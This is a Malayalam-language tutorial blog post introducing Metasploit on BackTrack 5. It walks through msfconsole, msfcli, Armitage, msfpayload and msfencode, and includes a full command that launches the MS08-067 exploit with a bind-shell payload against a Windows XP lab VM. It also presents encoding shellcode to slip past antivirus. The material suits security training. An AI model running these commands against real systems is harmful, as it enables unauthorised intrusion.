.
XyberSec

XyberSec • Join Our Growing Community Of Kerala Hackers

മെറ്റാസ്പ്ലോയ്റ്റ് ഒരു അവലോകനം

 ‘Penetration testing’ എന്ന വാക്ക് ഹാക്കിംഗിനെ പറ്റി കുറച്ചെങ്കിലും അറിവുള്ളവര്‍ക്ക് സുപരിചിതമാണ്. മറ്റൊരു കമ്പ്യൂട്ടറിലെക്കോ കമ്പ്യൂട്ടര്‍ നെറ്റ്വര്‍ക്കിലേക്കോ ഒരു ഹാക്കര്‍ക്ക് നുഴഞ്ഞു കയറാന്‍ സാധിക്കുമോ എന്ന് പരിശോധിക്കുന്ന പ്രക്രിയയെ ആണ് Penetration testing എന്ന് വിളിക്കുന്നത്. ഇതിനായി ഉപയോഗിക്കപ്പെടുന്ന ഏറ്റവും പ്രധാനപ്പെട്ട ഉപകരണങ്ങളില്‍ ഒന്നാണ് മെറ്റാസ്പ്ലോയ്റ്റ്. എങ്കിലും ഒരു തുടക്കക്കാരന് ഈ സോഫ്റ്റ്‌വെയര്‍ വളരെ വിഷമം പടിച്ച ഒന്നായി തോന്നാന്‍ സാധ്യത ഉണ്ട്. ഇതില്‍ നിങ്ങളെ സഹായിക്കുവാനായി ആണ് ഈ ലേഖനം തയ്യാറാക്കിയിരിക്കുന്നത്. ഇതില്‍ കൂടുതലും നാം വിന്‍ഡോസ്‌ കമ്പ്യൂട്ടറുകള്‍ ആണ് ലക്ഷ്യം വെക്കുന്നത്. പക്ഷെ ഒന്നോര്‍ക്കുക: നിങ്ങള്‍ ഇത് വായിച്ച് എന്തു ചെയ്താലും ഞാന്‍ അതിന്‌ ഉത്തരവാദി ആയിരിക്കുന്നതല്ല. ഇവിടെ തന്നിരിക്കുന്ന വിവരങ്ങള്‍ സ്വന്തം അറിവിനായി മാത്രം ഉപയോഗിക്കുക.

നാം മെറ്റാസ്പ്ലോയ്റ്റില്‍ കൂടുതല്‍ ആയി ഉപയോഗിക്കുന്ന ചില വാക്കുകള്‍ ഇവിടെ പരിചയപ്പെടുത്തുന്നു.

    Exploit ഒരു സോഫ്റ്റ്‌വെയറിലെയോ, കമ്പ്യൂട്ടറിലെയോ, നെറ്റ്വര്‍ക്കിലെയോ സുരക്ഷാ പഴുതുകളെ കുറിക്കാന്‍ ഈ പദം ഉപയോഗിക്കുന്നു.

    Payload മെറ്റാസ്പ്ലോയ്റ്റ് ഉപയോഗിച്ച് മറ്റൊരു കമ്പ്യൂട്ടറില്‍ പ്രവര്‍ത്തിപ്പിക്കുന്ന കോഡിനെ സൂചിപ്പിക്കുന്നു.

    Module ഒരു ആക്രമണം നടത്തുവനായി മെറ്റാസ്പ്ലോയ്റ്റ് ഫ്രെയിംവര്‍ക്കിലേക്ക് ചേര്‍ക്കുന്ന ഒരു ചെറിയ കോഡ്‌.

    Shellcode പേലോഡ് ആയി ഉപയോഗിക്കപ്പെടുന്ന ഒരു ചെറിയ code.

    MSFconsole

    മെറ്റാസ്പ്ലോയ്റ്റിലൂടെയുള്ള മിക്കവാറും എല്ലാ പ്രവര്‍ത്തനങ്ങളും നാം ചെയ്യുന്നത് ഈ വിന്‍ഡോയിലൂടെ ആയിരിക്കും. ഇത് ആക്രമണങ്ങള്‍ നടത്താനും കൂടാതെ മറ്റു പല ആവശ്യങ്ങള്‍ക്കും ഉപയോഗിക്കുന്നു. ഈ ലേഖനത്തിലുടനീളം നാം Msfconsole നാം ഉപയോഗിക്കുന്നതായിരിക്കും. ഉപയോഗിക്കുന്തോറും അതില്‍ കൂടുതല്‍ പ്രാവീണ്യം നേടാന്‍ നിങ്ങള്‍ക്കാകും. മെറ്റാസ്പ്ലോയ്റ്റ് ബാക്ക്‌ട്രാക്ക് 5ല്‍ ഇന്‍സ്റ്റോള്‍ ചെയ്യപ്പെട്ടിട്ടുണ്ട്. Msfconsole എടുക്കുവാനായി, നിങ്ങളുടെ ബാക്ക്‌ട്രാക്കിലെ console തുറന്നു താഴെ കാണുന്ന command ടൈപ്പ് ചെയ്യുക:

    [email protected]: ~# cd /opt/framework3/msf3/

    [email protected]: ~#/opt/framework3/msf3# msfconsole

    ഏതാനും നിമിഷങ്ങള്‍ക്കുള്ളില്‍ Msfconsole പ്രത്യക്ഷപ്പെടും.




    ഇവിടെ സഹായം ആവശ്യമാണെങ്കില്‍ help എന്ന് ടൈപ്പ് ചെയ്തതിനുശേഷം command ടൈപ്പ് ചെയ്യുക.
    ഉദാഹരണം: msf > help connect

    MSFcli

    മെറ്റാസ്പ്ലോയ്റ്റ് ഉപയോഗിക്കുവാനുള്ള മറ്റൊരു ഇന്റര്‍ഫേസ് ആണ് MSFcli. MSFconsole പോലെതന്നെ ഇതുപയോഗിച്ചും മെറ്റാസ്പ്ലോയ്റ്റ് പ്രവര്‍ത്തിപ്പിക്കുവാന്‍ സാധിക്കും. മറ്റ് console അധിഷ്ടിത ടൂള്‍സ് ഉപയോഗിക്കാന്‍ MSFcli ആണ് ഉചിതം. MSFcli തുറക്കുവാനായി നിങ്ങളുടെ ബാക്ക്‌ട്രാക്കിലെ console തുറന്നു താഴെ കാണുന്ന command ടൈപ്പ് ചെയ്യുക:

    [email protected]:~# cd /opt/framework3/msf3

    [email protected]:~# msfcli -h



    ഇനി നമുക്ക് MSFcliയുടെ പ്രവര്‍ത്തനംനോക്കാം.മെറ്റാസ്പ്ലോയ്റ്റ് ഉപയോഗിക്കുമ്പോള്‍ എന്തെങ്കിലും തടസ്സം നേരിട്ടാല്‍ command ടൈപ്പ് ചെയ്യുന്നതിന്റെ അവസാനം O എന്ന് ചേര്‍ത്താല്‍ അതിന്റെ options കാണാന്‍ കഴിയും.

    ഉദാഹരണം:  [email protected]:~# msfcli windows/smb/ms08_067_netapt o


     
    ഇവിടെ കാണിച്ചിരിക്കുന്ന moduleല്‍ മൂന്ന്‍ ഓപ്‌ഷനുകള്‍ ആണ് ഉള്ളത്. RHOST, RPORT, SMPIPE എന്നിവ.Commandന്‍റെ അവസാനഭാഗത്ത്‌  'P' എന്ന്ചേര്‍ക്കുമ്പോള്‍, ഇവിടെ ഉപയോഗിക്കാവുന്ന പേലോഡ്കളുടെ ഒരു ലിസ്റ്റ് കാണാന്‍കഴിയും.

    ഉദാഹരണം: [email protected]~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P



    ഇവിടെനിന്ന് ഒരു പേലോഡ് തിരഞ്ഞെടുത്ത് നമുക്ക് നമ്മുടെ exploit റണ്‍ ചെയ്യാന്‍ സാധിക്കും. അതിനായി ഓപ്‌ഷന്‍സ് കൊടുത്ത ശേഷം, commandന്‍റെ കൂടെ 'E' എന്ന് ടൈപ്പ് ചെയ്യുക. അതായത് 

    [email protected]~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E


    ഇവിടെ RHOSTല്‍ കൊടുത്തിരിക്കുന്ന ഐപി അഡ്രസ്‌, അതേ കമ്പ്യൂട്ടറില്‍ തന്നെ പ്രവര്‍ത്തിക്കുന്ന ഒരു വിന്‍ഡോസ്‌ എക്സ് പി Virtual Machineന്റെതാണ്. ഈ Virtual Machine ആണ് നാം ടെസ്റ്റ്‌ ചെയ്യുന്നത്. നിങ്ങള്‍ക്ക് ഇതിന്റെ സ്ഥാനത്ത് മറ്റൊരു കമ്പ്യൂട്ടര്‍ ഉപയോഗിക്കാവുന്നതാണ്.  പഠിക്കുവാനായി ചെയ്യുമ്പോള്‍ Virtual Machine അപ്ഡേറ്റ് ചെയ്യാതിരിക്കാനും ആന്റി വൈറസ്‌ ഉപയോഗിക്കാതിരിക്കാനും ശ്രദ്ധിക്കുക. കാരണം അവ ഉണ്ടെങ്കില്‍ സുരക്ഷാ പഴുതുകള്‍ അടക്കപ്പെടനും നമ്മുടെ പ്രവൃത്തി കൂടുതല്‍ ദുഷ്കരമായിത്തീരാനും സാധ്യത ഉണ്ട്.

     മെറ്റാസ്പ്ലോയ്റ്റിന്റെ ഗ്രാഫിക്കല്‍ യൂസര്‍ ഇന്റര്‍ഫേസ് (GUI) ആണ് Armitage. ഇത് തുറക്കുവാനായി armitage എന്ന command റണ്‍ ചെയ്യുക. അതിനുശേഷം Start MSF തിരഞ്ഞെടുക്കുക.


    MSFpayload

    Shellcode കളും മറ്റും നിര്‍മിക്കുന്ന മെറ്റാസ്പ്ലോയ്റ്റ്ലെ ഒരു ഭാഗമാണ്  MSFpayload. C, റൂബി, ജാവാ സ്ക്രിപ്റ്റ്, വിഷ്വല്‍ ബേസിക് എന്നിങ്ങനെ പല രൂപങ്ങളില്‍ Shellcode നിര്‍മിക്കാവുന്നതാണ്. വ്യത്യസ്ത സാഹചര്യങ്ങളില്‍ ഈ വ്യത്യസ്ത പല സാഹചര്യങ്ങളില്‍ ഉപയോഗപ്രദമാണ്. MSFpayload സഹായത്തിനായി താഴെ കാണുന്ന command ഉപയോഗിക്കുക.

    [email protected]:~# msfpayload -h


    MSFcli പോലെതന്നെ ഓപ്‌ഷനുകള്‍ കാണുവാനായി command ടൈപ്പ് ചെയ്യുന്നതിന്റെ അവസാനം O എന്ന് ചേര്‍ക്കുക. 

    [email protected]:~# msfpayload windows/shell_reverse_tcp O

    MSFencode

    MSFpayload ഉപയോഗിച്ച് നിര്‍മിക്കുന്ന ഷെല്‍കോഡുകള്‍ മറ്റൊരു കമ്പ്യൂട്ടറില്‍ എത്തിച്ചേരുമ്പോള്‍ അതിലുള്ള ആന്റി വൈറസ്‌ അല്ലെങ്കില്‍ മറ്റു സുരക്ഷാ സോഫ്റ്റ്‌വെയറുകള്‍ അത് കണ്ടെത്തുകയും, ഈ ഷെല്‍കോഡിന്റെ പ്രവര്‍ത്തനം തടസ്സപ്പെടുത്തുകയും ചെയ്യാന്‍ സാധ്യത ഉണ്ട്. ഇതിനു പരിഹാരമായാണ് MSFencode നിര്‍മിച്ചിരിക്കുന്നത്. ഇത് ഉപയോഗിക്കുമ്പോള്‍ നമ്മുടെ ഷെല്‍കോഡ് മറ്റൊരു കമ്പ്യൂട്ടറിലേക്ക് അയക്കുന്നതിനുമുന്പ് പ്രത്യേക രീതിയില്‍ കോഡ് ചെയ്യുന്നു.വ്യത്യസ്ത തരം കോഡിങ്ങുകള്‍ കാണുവാനായി ഈ command ഉപയോഗിക്കുക.

    [email protected]:~# msfencode -l

    സഹായത്തിനായി ഈ command ഉപയോഗിക്കുക.

    [email protected]:~# msfencode -h



    ഈ പോസ്റ്റ്‌ നിങ്ങള്ക്ക് പ്രയോജനപ്രദമായി എന്ന് വിശ്വസിക്കുന്നു. ദയവായി അഭിപ്രായങ്ങള്‍ താഴെ രേഖപ്പെടുത്തുക.
    Enjoying these posts? Subscribe for more
    Subscribe now

    Subscribe to be notified of new content and support XyberSec! You'll be a part of the community helping keep this site independent and ad-free.

    You've successfully subscribed to XyberSec
    Great! Next, complete checkout for full access to XyberSec
    Welcome back! You've successfully signed in
    Success! Your account is fully activated, you now have access to all content.